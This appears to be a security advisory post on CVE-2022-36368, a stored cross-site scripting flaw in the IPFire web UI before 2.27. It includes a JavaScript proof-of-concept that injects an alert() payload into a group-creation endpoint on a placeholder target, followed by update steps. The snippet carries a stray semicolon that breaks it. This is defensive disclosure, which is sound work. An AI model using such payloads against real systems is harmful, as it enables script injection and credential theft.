CVE-2022-36368: Authenticated Remote Stored Cross-Site Scripting Vulnerabilities in IPFire Web UI Prior to 2.27

A series of stored Cross-Site Scripting (XSS) vulnerabilities have been identified in the web user interface of IPFire firewall solutions running on versions prior to 2.27. An attacker with administrative privileges can inject arbitrary scripts which could lead to various harm, including the theft of credentials, defacement of websites, or redirecting users to other malicious sites.

IPFire (https://www.ipfire.org/) is an open-source firewall distribution aimed at offering a secure, easy-to-set up and administrate firewall solution for individuals and companies. If you are running IPFire versions older than 2.27, this post will provide the necessary steps to understand the vulnerability, identify whether you are affected, and take action to remediate the issue.

Details of CVE-2022-36368 Vulnerabilities

These vulnerabilities allow remote authenticated attackers with administrative privileges to inject arbitrary scripts via the web user interface, leading to stored XSS. Here's a code snippet demonstrating the exploit:

(function(){
    var xss_payload = "<img src=x onerror=alert('XSS')>";
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://TARGET_IP/cgi-bin/newGroup.cgi";, true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
            console.log("XSS payload injected");
        }
    }
    var data = "alias=" + encodeURIComponent(xss_payload) + "&submit=Create+Group";
    xhr.send(data);
})();

In this example, the XSS payload is a simple alert() function that displays a pop-up with the message "XSS". Replace TARGET_IP with the IP address of your IPFire instance.

CVE-2022-36368 was assigned to this vulnerability, and you can find more information on the official CVE database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36368
This vulnerability has been patched in IPFire 2.27, as reported by the IPFire security advisory: https://wiki.ipfire.org/optimization/start/security-advisory-114

Steps to Determine if You Are Affected by CVE-2022-36368

1. Access your IPFire web user interface and locate the version number usually displayed on the top right corner in the default dashboard.

2. If your IPFire version is older than 2.27, there is a considerable chance that your system might be affected by this vulnerability. We strongly recommend updating your IPFire version immediately to mitigate the risk associated with these stored XSS vulnerabilities.

Go to "IPFire" -> "System" -> "Pakfire."

3. Click the "Update now" button to update your IPFire version to the latest available release, which should include the patch to fix this stored XSS vulnerability.

4. Monitor your system logs and the IPFire community to stay informed about any new security threats and ensure good security practices.

Conclusion

The group behind IPFire has timely addressed the reported stored XSS vulnerabilities in versions prior to 2.27, releasing patches to provide the necessary fixes. If your IPFire installation is still running on an older version, it is time to upgrade to ensure your system's security. Following good security practices and keeping your system up-to-date will protect you from vulnerabilities like CVE-2022-36368 and any future threats.

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/25/2022 12:58:00 UTC